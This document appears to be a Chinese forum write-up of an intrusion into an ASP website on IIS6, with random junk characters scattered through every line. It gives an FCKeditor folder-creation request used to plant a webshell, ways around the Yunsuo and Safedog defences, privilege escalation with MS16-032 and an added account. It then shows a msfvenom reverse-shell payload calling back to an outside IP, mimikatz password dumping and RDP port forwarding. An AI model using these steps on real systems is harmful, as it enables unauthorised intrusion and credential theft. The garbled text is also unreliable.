& Q& r8 B8 ~+ H! m
/ z8 V* g# I. W5 ` # h" g# T* V) N9 W8 A
$ e: P1 B) Z9 X+ u一、 利用getwebshell篇 l6 @+ q4 e8 M& I% w3 @2 y6 |' S B
! ?$ t& k+ v* p3 N# L
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
& A. z) P! }9 S1 s5 L , y+ a3 ]* E; A5 t$ I i

6 Q! W' R! [; N5 h9 o W G下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
8 s2 k' C; k1 p$ e" W P
4 k# |6 S) i* K+ k7 S9 l) m [: f# D下面我们构造一个asp目录,如: ' f% L4 g7 [8 E& e5 m8 L) T
/ _+ \( ]- K3 J
' O% @2 F5 t7 a; w! t w# E& ? http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
5 d' S. l7 l. \$ y2 k , [! e; ?0 ]8 ?! C# \# T
0 P, h( J1 G0 o
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 + P9 ^$ [+ A3 h( u
/ }! g/ B o B- f! r0 P( S一、 绕过安全狗云锁提权并且加账号
0 X5 c, v) }1 I' ]
# Q8 C& N2 s% C/ m- a没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干 & p( L; [- {# W1 M- p! |* `
9 S7 e6 x- p. S# g# A: u# z如图: ) V2 {( Z$ w% S8 T/ O. K

, U9 ?' ^' M( V4 G; V- O5 _然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit ) K2 o' ]4 m% c7 H; J3 Q
7 _: `% i9 g0 g' Z6 Q* z) v
一、 利用metasploit 3 A0 _' s- [/ V9 i. b* w
c9 T% X* j3 P- r% n$ [+ j
首先用pentestbox生成一个64位的payload如下命令 % c; ]4 C# Y, X) O9 ?7 }2 \
, u4 R0 `% ^5 Q" I
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
2 p- d5 I6 d* c, ~. H
! K. N8 I, K1 |3 z- y( K4 `为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
/ \2 B1 N2 N( ^5 e* D# Z7 m6 H / d5 k3 Y3 l' b L# {
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图: / f8 o6 t$ u* u
 % z# d* F% t8 F- |: ~6 Z8 v" Y. b8 d
下面我们来做一个监听如下命令:
2 Y* q- L' t# E" v) K2 [+ z X 6 l, h B$ N# X4 G, j _, {7 [
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
6 y. y7 F0 Z: H, ~* [# D Z: K, p( V$ s6 N! v5 p
9 @4 h9 b" Y& C! i" { A; ` | ( g# f. g6 \6 K& @1 `9 J) w0 D4 i